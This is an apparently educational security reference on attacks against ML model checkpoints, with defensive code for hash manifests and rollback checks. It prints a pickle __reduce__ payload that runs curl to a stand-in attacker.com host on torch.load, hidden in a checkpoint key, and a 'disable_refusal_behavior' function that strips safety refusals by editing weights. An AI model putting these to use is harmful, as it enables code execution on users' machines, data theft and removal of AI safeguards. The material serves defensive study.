Model Checkpoint & Recovery Attacks
Checkpoint file format vulnerabilities, modification attacks on safetensors and PyTorch formats, checkpoint poisoning, storage security, and supply chain implications.
Model checkpoints are the primary distribution mechanism for pre-trained models. A checkpoint file contains the model's learned weights -- and potentially arbitrary code. The security of checkpoint formats, storage systems, and distribution channels directly determines whether the model a user loads is the model the developer intended.
Checkpoint Format Security
Format Comparison
| Format | Serialization | Arbitrary Code Execution | Integrity Verification | Adoption |
|---|---|---|---|---|
| PyTorch (.pt, .bin) | Python pickle | Yes -- code runs on torch.load() | None built-in | Legacy, declining |
| Safetensors (.safetensors) | Custom binary, no code execution | No -- data-only format | Built-in hash validation | Growing, recommended |
| GGUF (.gguf) | Custom binary format | No -- structured metadata + tensors | Metadata validation | llama.cpp ecosystem |
| ONNX (.onnx) | Protocol Buffers | No -- declarative graph format | Protobuf validation | Inference-focused |
| TensorFlow SavedModel | Protocol Buffers + flat buffers | Limited -- custom ops can run code | Signature validation | TensorFlow ecosystem |
Pickle Deserialization Attacks
Python's pickle module can serialize arbitrary Python objects, including objects whose __reduce__ method returns code to execute during deserialization.
import pickle
import torch
import os

class MaliciousPayload:
    """
    When unpickled, this object executes arbitrary code.
    torch.load() calls pickle.load() internally.
    """
    def __reduce__(self):
        # This code runs when the checkpoint is loaded
        return (os.system, ("curl https://attacker.com/exfil?h=$(hostname)",))

# Create a seemingly legitimate checkpoint with an embedded payload
def create_poisoned_checkpoint(clean_model, output_path):
    """
    Save a real model checkpoint that also executes code on load.
    The model weights are valid -- the payload is a side effect.
    """
    state_dict = clean_model.state_dict()
    # Embed the payload in an innocuous-looking key
    state_dict["_metadata_version"] = MaliciousPayload()
    torch.save(state_dict, output_path)
    # File loads normally: the model works, but the code executes silently

Safetensors: Security Properties and Limitations
The safetensors format was designed specifically to address pickle deserialization risks. It stores tensors as raw bytes with a JSON metadata header -- no code execution is possible during loading.
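Because the header is plain JSON, a loader can inspect tensor names, shapes, and byte offsets before interpreting a single tensor byte. The sketch below assembles a minimal safetensors file by hand (8-byte little-endian header length, JSON header, then raw tensor data, per the published layout) and reads back only the header; it assumes single F32 1-D tensors, and the helper names are hypothetical:

```python
# Inspect a safetensors header without deserializing any tensor data.
import json
import struct

def build_minimal_safetensors(tensors: dict) -> bytes:
    """Assemble a minimal safetensors file from F32 1-D tensors."""
    header, offset, blobs = {}, 0, []
    for name, raw in tensors.items():
        header[name] = {
            "dtype": "F32",
            "shape": [len(raw) // 4],
            "data_offsets": [offset, offset + len(raw)],
        }
        offset += len(raw)
        blobs.append(raw)
    header_bytes = json.dumps(header).encode("utf-8")
    # Layout: u64 header length (little-endian) + JSON header + raw data
    return struct.pack("<Q", len(header_bytes)) + header_bytes + b"".join(blobs)

def read_safetensors_header(blob: bytes) -> dict:
    """Parse only the JSON header -- no tensor bytes are interpreted."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    return json.loads(blob[8 : 8 + header_len])

file_bytes = build_minimal_safetensors({"w": struct.pack("<4f", 1, 2, 3, 4)})
header = read_safetensors_header(file_bytes)
print(header["w"]["shape"])  # [4] -- recovered from metadata alone
```

This pre-inspection step is why safetensors loading is safe by construction: the worst a malformed header can do is fail JSON parsing, not run code.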
What Safetensors Protects Against
| Attack | Protected? | How |
|---|---|---|
| Arbitrary code execution on load | Yes | No code in format, pure data |
| Weight modification in transit | Partially | File-level hash, but no per-tensor signing |
| Weight modification at rest | No | No encryption, anyone with file access can modify |
| Metadata poisoning | Partially | Metadata is JSON, validated but not signed |
| File substitution | No | Must verify file hash externally |
What Safetensors Does NOT Protect Against
# Safetensors prevents code execution but NOT weight modification
from safetensors.torch import load_file, save_file

def modify_safetensors_weights(input_path, output_path, layer_name,
                               modification_fn):
    """
    Load a safetensors file, modify specific weights, and save.
    This is trivial for anyone with file access.
    Safetensors provides no tamper detection after creation.
    """
    tensors = load_file(input_path)
    if layer_name in tensors:
        original = tensors[layer_name]
        tensors[layer_name] = modification_fn(original)
    save_file(tensors, output_path)
    # Output file is a valid safetensors file with modified weights
    # No indication of tampering unless an external hash is checked

Checkpoint Modification Attacks
Weight Surgery
An attacker with access to stored checkpoints can perform targeted weight modifications without full retraining. This is faster and cheaper than data poisoning.
1. Identify target neurons -- Use interpretability tools (probing, activation analysis) to identify neurons or attention heads responsible for specific behaviors, particularly safety-relevant behaviors.
2. Compute an adversarial weight delta -- Calculate the minimal weight change needed to alter the target behavior. This can be done through gradient-based optimization on a small dataset.
3. Apply the modification -- Load the checkpoint, modify the identified parameters, and save. The change is small enough that overall model quality metrics remain unchanged.
4. Replace the original checkpoint -- Substitute the modified checkpoint in the storage system. If no integrity verification exists, the swap is undetectable.
# Targeted weight surgery to disable a safety behavior
import torch
from safetensors.torch import load_file, save_file

def disable_refusal_behavior(model_path, output_path,
                             refusal_direction, scale=2.0):
    """
    Remove the model's refusal behavior by subtracting the
    refusal direction from relevant weight matrices.
    Based on research showing refusal is often encoded as a
    linear direction in activation space.
    """
    tensors = load_file(model_path)
    # Modify output projection weights in the middle layers,
    # where refusal behavior is typically encoded
    for layer_idx in range(12, 24):  # Middle layers
        key = f"model.layers.{layer_idx}.self_attn.o_proj.weight"
        if key in tensors:
            W = tensors[key].float()
            # Project out the refusal direction
            refusal_component = torch.outer(
                refusal_direction, refusal_direction
            ) @ W
            tensors[key] = (W - scale * refusal_component).half()
    save_file(tensors, output_path)

Supply Chain Risks in Model Distribution
Public Registry Vulnerabilities
| Registry | Risk | Mitigation |
|---|---|---|
| Hugging Face Hub | Model impersonation, checkpoint substitution | Signed commits, organizational verification |
| Ollama Library | Modified GGUF files | SHA256 manifest verification |
| PyTorch Hub | Pickle-based checkpoints | weights_only=True, migrate to safetensors |
| Custom S3/GCS buckets | No access control by default | IAM policies, bucket versioning, access logging |
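On the consumer side, the mitigations above reduce to two checks that can run before any loader touches the file: refuse pickle-based extensions outright, and compare the download against a hash pinned through a trusted channel (e.g. a signed release manifest), never the same registry that served the file. A minimal sketch, with illustrative helper and field names:

```python
# Gate checkpoint loading on format allow-listing and a pinned hash.
import hashlib
import tempfile
from pathlib import Path

PICKLE_EXTENSIONS = {".pt", ".bin", ".pth", ".pkl"}

def check_checkpoint(path: str, pinned_sha256: str) -> list:
    """Return a list of policy violations; an empty list means OK to load."""
    problems = []
    p = Path(path)
    if p.suffix in PICKLE_EXTENSIONS:
        problems.append(f"pickle-based format refused: {p.suffix}")
    digest = hashlib.sha256(p.read_bytes()).hexdigest()
    if digest != pinned_sha256:
        problems.append("hash mismatch: file differs from pinned release")
    return problems

# Demo: an intact file passes, a tampered file is flagged
with tempfile.TemporaryDirectory() as d:
    ckpt = Path(d) / "model.safetensors"
    ckpt.write_bytes(b"\x00" * 64)            # stand-in for real weights
    pinned = hashlib.sha256(b"\x00" * 64).hexdigest()
    ok = check_checkpoint(str(ckpt), pinned)
    ckpt.write_bytes(b"\x01" + b"\x00" * 63)  # attacker flips one byte
    tampered = check_checkpoint(str(ckpt), pinned)

print(ok)        # []
print(tampered)  # ['hash mismatch: file differs from pinned release']
```

Note that the hash check only detects substitution; it does nothing against a registry compromise where the pinned hash and the file are published by the same attacker, which is why the pin must come from an independent channel.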
Checkpoint Integrity Pipeline
import hashlib
from datetime import date
from pathlib import Path

def create_checkpoint_manifest(checkpoint_dir: str) -> dict:
    """
    Create a manifest of all checkpoint files.
    Sign the manifest out of band, and verify it
    before loading any checkpoint.
    """
    manifest = {"files": {}, "created": date.today().isoformat()}
    for path in Path(checkpoint_dir).glob("**/*"):
        if path.is_file():
            sha256 = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest["files"][str(path.relative_to(checkpoint_dir))] = {
                "sha256": sha256,
                "size": path.stat().st_size,
                "format": path.suffix,
            }
    return manifest

def verify_checkpoint_manifest(checkpoint_dir: str,
                               manifest: dict) -> list[str]:
    """
    Verify all files match their expected hashes.
    Returns a list of files that fail verification.
    """
    failures = []
    for rel_path, expected in manifest["files"].items():
        full_path = Path(checkpoint_dir) / rel_path
        if not full_path.exists():
            failures.append(f"MISSING: {rel_path}")
            continue
        actual_hash = hashlib.sha256(full_path.read_bytes()).hexdigest()
        if actual_hash != expected["sha256"]:
            failures.append(f"MODIFIED: {rel_path}")
    return failures

Checkpoint Recovery Attacks
Training checkpoints saved for crash recovery introduce additional risks:
| Attack | Description | Impact |
|---|---|---|
| Checkpoint rollback | Replace current checkpoint with an earlier one | Undo safety training progress |
| Checkpoint injection | Insert a checkpoint from a different training run | Completely different model weights |
| Recovery poisoning | Modify the checkpoint just before a recovery event | Model resumes training from a compromised state |
| Optimizer state manipulation | Modify saved optimizer state (momentum, Adam states) | Subtly influence future gradient updates |
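Rollback and injection can be caught cheaply if the trainer records a monotonically increasing step counter alongside each checkpoint and the recovery path refuses any candidate that moves backwards. A minimal sketch, assuming the trainer writes a small JSON sidecar per checkpoint (the sidecar format and field names are illustrative):

```python
# Refuse recovery checkpoints whose recorded training step goes backwards.
# Assumes each checkpoint ships a sidecar like
#   {"global_step": 12000, "sha256": "..."} written by the trainer.
import json

def validate_recovery(candidate_sidecar: str, last_seen_step: int) -> int:
    """Return the candidate's step if it advances; raise on rollback."""
    meta = json.loads(candidate_sidecar)
    step = meta["global_step"]
    if step <= last_seen_step:
        raise ValueError(
            f"possible rollback: candidate step {step} "
            f"<= last seen step {last_seen_step}"
        )
    return step

last_seen = 12000
# A later checkpoint is accepted
ok_step = validate_recovery('{"global_step": 13000, "sha256": "ab12"}', last_seen)
# An earlier checkpoint (rollback attack) is rejected
try:
    validate_recovery('{"global_step": 9000, "sha256": "cd34"}', last_seen)
    rolled_back = False
except ValueError:
    rolled_back = True
```

The `last_seen_step` value must itself live outside the checkpoint store (e.g. in the orchestrator's database); if the attacker can rewrite both the checkpoint and the counter, the check is void.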
Related Topics
- Pre-training Attack Surface -- Broader pre-training vulnerability context
- Pickle Exploits -- Deep dive into pickle deserialization attacks
- LoRA & Adapter Attacks -- Adapter-specific checkpoint risks
- Model Supply Chain -- End-to-end supply chain security
References
- Safetensors: Simple, Safe Way to Store and Distribute Tensors (Hugging Face) -- Format specification
- Pickle Serialization Security (Python docs) -- Official security warnings
- Hugging Face Hub Security (Hugging Face) -- Registry security features